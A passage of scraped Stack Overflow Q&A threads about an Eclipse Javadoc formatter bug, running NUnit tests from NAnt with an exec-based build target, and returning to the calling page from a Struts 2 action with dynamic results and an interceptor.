"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "19"
} |
Q: Why does the Eclipse code formatter break in a Javadoc @see tag? I'm using Eclipse 3.4 and have configured the Java code formatter with all of the options on the Comments tab enabled. The problem is that when I format a document comment that contains:
* @see <a href="test.html">test</a>
the code formatter inserts a space in the closing HTML, breaking it:
* @see <a href="test.html">test< /a>
Why? How do I stop this happening?
This is not fixed by disabling any of the options on the Comments tab, such as Format HTML tags. The only work-around I found is to disable Javadoc formatting completely by disabling both the Enable Javadoc comment formatting and Enable block comment formatting options, which means I then have to format comment blocks manually.
A: I can only assume it's a bug in Eclipse. It only happens with @see tags, and it happens with all 3 built-in code formatter settings.
There are some interesting bugs reported already in the neighbourhood, but I couldn't find this specific one. See for example a search for @see in the Eclipse Bugzilla.
A: Strict XHTML compatibility guidelines suggest that self-closing tags should have a space before the closing slash, like so:
<gcServer enabled="true" /> <!-- note the space just after "true" -->
I can only assume, like Bart said, that there is a bug in Eclipse's reformatter that thinks the closing tag is actually a self-closing tag. Another idea: Can you verify that your a tags are balanced (i.e. no unclosed tags higher up in the document)?
A: This could be a bug in Eclipse 3.4. I'm using 3.3 (M20080221-1800), and do not observe this behavior.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45414",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: How to run NUnit v2.4.8 tests with NAnt 0.86 beta? I tried recently to use NAnt (beta 0.86.2962.0) to run some unit tests compiled with the last stable version of NUnit (v2.4.8) without any success.
The error I get is the following :
[nunit2] Assembly "C:\Dev\MySample\bin\tests\My.Sample.Tests.dll" contains no tests.
Of course, the assembly contains tests that I can run from any runner, like NUnit one, TestDriven or Resharper. I would like to use <nunit2> task, and not directly the <exec> one, but I'm wondering if it is still possible, even using app.config files to bind assembly versions.
A: I can't remember why, but I gave up on using the <nunit2> task and I've been using the <exec> task and nunit-console.exe happily. If it helps, here's my test target that runs NUnit and FxCop. Note that it skips them if the executables aren't in the Windows path.
<target name="test" description="Run unit tests" depends="build">
<property name="windows-path" value="${string::to-lower(environment::get-variable('PATH'))}"/>
<property name="nunit-in-path"
value="${string::contains(windows-path, 'nunit')}"/>
<echo message="Tests skipped because no NUnit folder was found in the Windows path."
unless="${nunit-in-path}"/>
<exec program="nunit-console.exe" if="${nunit-in-path}">
<arg file="../MyProject/MyProjectTest.nunit"/>
</exec>
<property name="fxcop-in-path"
value="${string::contains(windows-path, 'fxcop')}"/>
<echo message="FxCop skipped because no FxCop folder was found in the Windows path."
unless="${fxcop-in-path}"/>
<fxcop projectFile="../MyProject/MyProject.fxcop" directOutputToConsole="true"
failOnAnalysisError="true" if="${fxcop-in-path}"/>
</target>
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45415",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: Struts 2: return to calling page I'm using Struts 2.
I'd like to return from an Action to the page which invoked it.
Say I'm in page x.jsp, I invoke Visual action to change CSS preferences in the session; I want to return to x.jsp rather than to a fixed page (i.e. home.jsp)
Here's the relevant struts.xml fragment:
<action
name="Visual"
class="it.___.web.actions.VisualizationAction">
<result name="home">/pages/home.jsp</result>
</action>
Of course my VisualizationAction.execute() returns home.
Is there any "magic" constant (like, say, INPUT_PAGE) that I may return to do the trick?
Must I use a more involved method (i.e. extracting the request page and forwarding to it)?
T.I.A.
A: You can use a dynamic result in struts.xml. For instance:
<action
name="Visual"
class="it.___.web.actions.VisualizationAction">
<result name="next">${next}</result>
</action>
Then in your action, you create a field called next. So to invoke the action you will pass the name of the page that you want to forward to next. The action then returns "next" and struts will know which page to go to.
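The matching action just needs the next property (a sketch; the session work is elided):
import com.opensymphony.xwork2.ActionSupport;

public class VisualizationAction extends ActionSupport {
    // Populated from the request, e.g. a hidden field or query parameter
    // carrying the page to return to.
    private String next;

    public String getNext() { return next; }
    public void setNext(String next) { this.next = next; }

    @Override
    public String execute() {
        // ... change the CSS preferences in the session here ...
        return "next"; // struts.xml resolves ${next} against this action
    }
}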
There is a nicer explanation on this post: Stack Overflow
A: return INPUT;
will do the trick. The INPUT constant is defined in the Action interface itself. It indicates that the action needs more input.
If by "calling page" you meant the page that took you to the action's input page, then your input page will have to store the HTTP "Referer" header in the request scope for the Action.
A: My solution would involve one interface and one interceptor. You implement the following interface for all actions to which you are likely to want to redirect:
public interface TargetAware {
public String getTarget();
public void setTarget(String target);
}
The interceptor simply ensures that the target is set, if required:
public class SetTargetInterceptor extends MethodFilterInterceptor implements Interceptor {
public String doIntercept(ActionInvocation invocation) {
Object action = invocation.getAction();
HttpServletRequest request = (HttpServletRequest) invocation.getInvocationContext().get(StrutsStatics.HTTP_REQUEST);
if (action instanceof TargetAware) {
TargetAware targetAwareAction = (TargetAware) action;
if (targetAwareAction.getTarget() == null)
targetAwareAction.setTarget(getCurrentUri(request));
}
return invocation.invoke();
}
// I'm sure we can find a better implementation of this...
private static String getCurrentUri(HttpServletRequest request) {
String uri = request.getRequestURI();
String queryString = request.getQueryString();
if (queryString != null && !queryString.equals(""))
uri += "?" + queryString;
return uri;
}
public void init() { /* do nothing */ }
public void destroy() { /* do nothing */ }
}
From then on, once these two bits are in place and your actions implement the TargetAware interface (if you expect to have to redirect to them), then you have access to a target parameter in your JSPs whenever you need it. Pass that parameter on to your VisualizationAction (which might as well implement also the TargetAware interface!), and on SUCCESS, redirect as explained by Vincent Ramdhanie:
<action name="Visual" class="it.___.web.actions.VisualizationAction">
<result type="redirect">
<param name="location">${target}</param>
<param name="parse">true</param>
</result>
</action>
I did not try every single detail of this strategy. In particular, beware of the notation surrounding the redirect result type (depending on your specific version of Struts2: 2.0.x and 2.1.x may differ on this...).
A: I prefer the approach where you navigate users via particular actions.
http://domain.com/myAction.action
You could use a parameter as an indicator that you want to change the current design:
i.e.
http://domain.com/myAction.action?changeDesign=silver_theme
So then, you write a Struts 2 interceptor whose logic is to check for the presence of the 'changeDesign' parameter; this interceptor will do the necessary work of changing the design and will control the workflow. With an interceptor you decouple your actions from cross-cutting logic.
A: OK, in your class it.___.web.actions.VisualizationAction, you must return a string value containing INPUT; then, in struts.xml, you have to set something like this:
<action name="Visual" class="it.___.web.actions.VisualizationAction">
<result name="input">yourJspPage.jsp</result>
</action>
this will lead you to the page you want.
This should work; I've been working with Struts 2 for 2 months.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45424",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |